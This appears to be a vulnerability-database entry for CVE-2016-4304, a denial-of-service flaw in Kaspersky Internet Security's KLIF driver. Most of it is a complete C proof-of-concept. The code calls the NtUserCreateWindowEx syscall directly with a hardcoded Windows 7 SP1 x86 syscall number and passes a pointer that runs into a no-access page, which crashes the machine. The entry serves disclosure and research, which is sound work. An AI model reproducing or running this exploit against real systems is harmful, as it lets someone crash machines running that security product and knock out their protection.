Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Kaspersky Internet Security KLIF Driver NtUserCreateWindowEx_HANDLER Denial of Service(CVE-2016-4304)

🗓️ 13 Oct 2017 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 24 Views

Kaspersky KLIF Driver Denial of Service Vulnerabilit

Related
Code

                                                #include    <stdio.h>
#include    <conio.h>
#include    <windows.h>


typedef         DWORD UARCH;
typedef         BYTE  UCHAR;

#ifndef __UNICODE_STRING_DEFINED__
#define __UNICODE_STRING_DEFINED__
typedef struct _UNICODE_STRING {
  USHORT Length;        /* bytes */
  USHORT MaximumLength; /* bytes */
  PWSTR  Buffer;
} UNICODE_STRING, *PUNICODE_STRING;
#endif


#define ARG_START   (4*3)

DWORD           _SyscallStub                =   0;
DWORD           CreateWindowSyscallNum      =   0x1169;         // windows 7 sp1 x86

_declspec(naked) UARCH          CallSyscall32_EXT(UINT32 SyscallNumber,
                   UARCH Arg1,
                   UARCH Arg2,
                   UARCH Arg3,
                   UARCH Arg4,
                   UARCH Arg5,
                   UARCH Arg6,
                   UARCH Arg7,
                   UARCH Arg8,

                   UARCH Arg9,
                   UARCH Arg10,
                   UARCH Arg11,
                   UARCH Arg12,
                   UARCH Arg13,
                   UARCH Arg14,
                   UARCH Arg15)
{
    _asm
    {

        ; we cant use registers here (ebx, esi, edi, ebp*) sorry or everything will start crashing

        push    ebp
        mov     ebp, esp


        ; stack[arguments]

        //int       3


        push    [ebp + ARG_START + (4 * 14)]
        push    [ebp + ARG_START + (4 * 13)]
        push    [ebp + ARG_START + (4 * 12)]
        push    [ebp + ARG_START + (4 * 11)]
        push    [ebp + ARG_START + (4 * 10)]
        push    [ebp + ARG_START + (4 * 9)]
        push    [ebp + ARG_START + (4 * 8)]

        push    [ebp + ARG_START + (4 * 7)]
        push    [ebp + ARG_START + (4 * 6)]
        push    [ebp + ARG_START + (4 * 5)]
        push    [ebp + ARG_START + (4 * 4)]
        push    [ebp + ARG_START + (4 * 3)]
        push    [ebp + ARG_START + (4 * 2)]
        push    [ebp + ARG_START + (4 * 1)]
        push    [ebp + ARG_START + (4 * 0)]

        mov     eax, [ebp + 8]              ; syscall number
        call    dword ptr[_SyscallStub]

        mov     esp, ebp
        pop     ebp
        ret     4 + (4*15)

    }
}

int GetSyscallStub(void)
{
    DWORD   temp    =   (DWORD)GetProcAddress((HMODULE)LoadLibrary("user32.dll"), "InvalidateRect");
    if (!temp)
    {
        printf(__FUNCTION__": unable to get syscall stub \r\n");
        exit(-1);
    }

    _SyscallStub    =   temp + 5;
    return 1;
}

int ProtectMemory(PVOID Mem, DWORD Size, DWORD ProtectRights)
{
    DWORD oldp;
    if (VirtualProtect(Mem, Size, ProtectRights, &oldp) != 0)
        return 1;
    return 0;
}



void crash_kaspersky(void)
{
    WNDCLASSEX      wcex;
    char WND_CLASS[] = "WWW";

    ZeroMemory(&wcex, sizeof(wcex));
    wcex.cbSize         =   sizeof(WNDCLASSEX);

    wcex.style          =   CS_HREDRAW | CS_VREDRAW;
    wcex.lpfnWndProc    =   (WNDPROC)&crash_kaspersky;
    wcex.hInstance      =   (HINSTANCE)GetModuleHandle(NULL);
    wcex.lpszClassName  =   WND_CLASS;
    wcex.hbrBackground  =   (HBRUSH)(COLOR_WINDOW + 1);
    wcex.hIcon          =   LoadIcon (NULL, IDI_APPLICATION) ;
    wcex.hCursor        =   LoadCursor (NULL, IDC_ARROW) ;

    if (RegisterClassEx(&wcex) == NULL)
    {
        printf(__FUNCTION__": error - RegisterClassEx() error code %d\n", GetLastError());
        return;
    }




    UNICODE_STRING us1;
    wchar_t     out_str[]   = L"WWW";
    us1.Buffer              = out_str;
    us1.MaximumLength       = us1.Length = lstrlenW(out_str);

    UCHAR *bad_pages = (UCHAR*)VirtualAlloc(0, 4096 * 2, MEM_COMMIT, PAGE_READWRITE);
    memset(bad_pages, 0x8, 4096 * 2);

    ProtectMemory((PVOID)&bad_pages[4096], 4096, PAGE_NOACCESS);
    UCHAR *bad = (UCHAR*)&bad_pages[4096 - 7];
    DWORD style =  WS_CAPTION | WS_SYSMENU | WS_GROUP;


    DWORD ret = CallSyscall32_EXT(CreateWindowSyscallNum,
        WS_EX_CLIENTEDGE,       // ex style
        (UARCH)&us1,            // class name // this does not trigger the bug
        (UARCH)bad,             // plstrClsVersion      // bug here tested
        (UARCH)&us1,            // plstrWindowName      // bug here tested
        style,
        0x10,
        0x20,
        0x30,
        0x40,
        NULL, //hParent
        NULL, //hMenu
        (UARCH)GetModuleHandle(NULL),
        0,
        0x400,
        0);

}

int main(void)
{
    GetSyscallStub();
    crash_kaspersky();
    return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
13 Oct 2017 00:00Current
5.5Medium risk
Vulners AI Score5.5
EPSS0.00064
kaspersky internet securityklif driverdenial of servicecve-2016-4304syscall filteringntusercreatewindowexaccess violationuser modevulnerability
24